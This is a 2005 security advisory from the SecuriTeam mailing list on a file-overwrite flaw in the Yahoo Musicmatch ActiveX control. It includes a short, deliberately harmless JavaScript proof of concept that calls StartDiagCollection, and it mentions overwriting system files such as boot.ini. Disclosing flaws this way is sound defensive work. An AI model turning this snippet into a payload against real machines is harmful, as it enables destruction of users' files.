[NT] Yahoo Musicmatch Remote File Inclusion

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/05

  • Next message: SecuriTeam: "[NEWS] Coppermine Photo Gallery Multiple XSS"
    To: list@securiteam.com
    Date: 19 Apr 2005 15:11:05 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Yahoo Musicmatch Remote File Inclusion
    ------------------------------------------------------------------------

    SUMMARY

    " <http://musicmatch.com/> Musicmatch Jukebox 10 is the most powerful way
    to find and organize your music, giving you ultimate control of your music
    experience. With a whole new range of library, playlist, and portable
    device controls, Musicmatch Jukebox is more powerful and easier to use
    than ever before." In September 2004 Musicmatch was purchased by Yahoo!
    Inc.

    Lack of parameters validation in Musicmatch ActiveX allows remote user to
    write files on the vulnerable systems.

    DETAILS

    Vulnerable Systems:
     * Musicmatch versions 10.00.2047 and prior
     * Musicmatch versions 9.00.5059 and prior (according to vendor)

    Immune Systems:
     * Musicmatch versions 9 and 10 (fixed versions since 03/21/05)

    DiagCollectionControl.dll is an ActiveX control which contains a Safe for
    Scripting Interface with a method called StartDiagCollection with the
    following definition:
    Dispatch Function BOOL StartDiagCollection(BSTR bstrSavePath, BSTR
    bstrUserEnteredInfo, BSTR bstrXMLControlFile, USERDEFINED eRequestType,
    BOOL bUploadInfo, BOOL bEncryptZipFile, TR numJobs )

    In this particular vulnerability, an attacker can pass in a malicious
    value into bstrSavePath (eg: c:\\boot.ini). Once that method is called,
    whichever file is specified will get overwritten.

    Exploit:
    The following is a non-malicious example:
    < h1>If you have a vulnerable version a file "foo.txt" has been written to
    the folder "c:\exploit".< br>
    < br>It could have been used to overwrite critical system files.</h1>
    < script>
    var foo;
    foo = new ActiveXObject("DiagCollectionControl.DiagCollectionA.1");
    foo.StartDiagCollection("c:\\exploit\\foo.txt", "userinfo", "", 1, true,
    false, "1");
    < /script>

    If you have the vulnerable ActiveX control, a file, foo.txt will be
    created in the c:\exploit directory. Obviously, much worse can be done as
    there is no restrictions to what files can be overwritten assuming the
    user has access to them. It may be possible to control the data that goes
    into the file as well, although I have not yet identified a method for
    doing this.

    Patch Availability:
    The following links can be used to find more information on the patch and
    the vulnerability: <http://www.musicmatch.com/download/free/security.htm>
    Musicmatch Jukebox Security Updates,
    <http://www.musicmatch.com/info/user_guide/faq/security_updates.htm>
    Security FAQ.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:robfly@hyperdose.com> Robert
    Fly.
    The original article can be found at:
    <http://www.hyperdose.com/advisories/H2005-02.txt>
    http://www.hyperdose.com/advisories/H2005-02.txt
    The original article can be found at:
    <http://www.hyperdose.com/advisories/H2005-03.txt>
    http://www.hyperdose.com/advisories/H2005-03.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Coppermine Photo Gallery Multiple XSS"

    Relevant Pages